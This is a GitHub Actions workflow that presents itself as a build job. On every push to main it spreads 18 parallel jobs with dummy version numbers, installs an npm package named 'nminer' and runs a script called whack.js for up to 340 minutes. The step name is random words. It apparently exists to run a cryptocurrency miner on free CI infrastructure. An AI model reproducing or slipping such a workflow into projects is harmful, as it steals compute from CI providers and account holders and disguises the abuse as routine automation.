name: whack
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 3485 }
          - { version: 3337 }
          - { version: 8456 }
          - { version: 2943 }
          - { version: 1354 }
          - { version: 4460 }
          - { version: 4459 }
          - { version: 9506 }
          - { version: 347 }
          - { version: 7691 }
          - { version: 3803 }
          - { version: 3982 }
          - { version: 8872 }
          - { version: 8985 }
          - { version: 1261 }
          - { version: 6333 }
          - { version: 1767 }
          - { version: 1625 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: nauseate chapel oh toward whoa
        run: |
          npm install nminer@latest
          timeout 340m node whack.js || echo "whack executed"